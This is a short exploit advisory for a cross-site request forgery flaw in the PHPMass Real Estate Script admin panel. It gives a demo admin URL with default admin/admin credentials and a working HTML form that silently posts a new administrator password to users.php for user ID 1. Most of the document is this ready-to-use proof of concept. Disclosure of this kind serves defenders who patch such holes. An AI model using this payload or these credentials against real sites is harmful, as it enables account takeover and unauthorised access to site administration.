< ------------------- header data start ------------------- >


#############################################################

# Application Name : PHPMass Real Estate Script

# Vulnerable Type : XSRF

# Infection : Administrator password Change Edilebilir.

# author : BARCOD3 - Bug Researchers

# Demo : http://itshop.phpmass.com/admin/

*Note;

Demo User; admin
Demo pass; admin


#############################################################


< ------------------- header data end of ------------------- >


< -- bug code start -- >

<h3>BARCOD3</h3>
<form name=UserForm action=victim.com/admin/users.php?UserID=1 method=post>
<input name=newpassword type=hidden class=textinput id=newpassword value=passWORD size=25/>
<input name=paswordagain type=hidden class=textinput id=paswordagain value=passWORD size=25/>
<input type=submit name=updatepass value=update class=submitbutton/>
</form>



< -- bug code end of -- >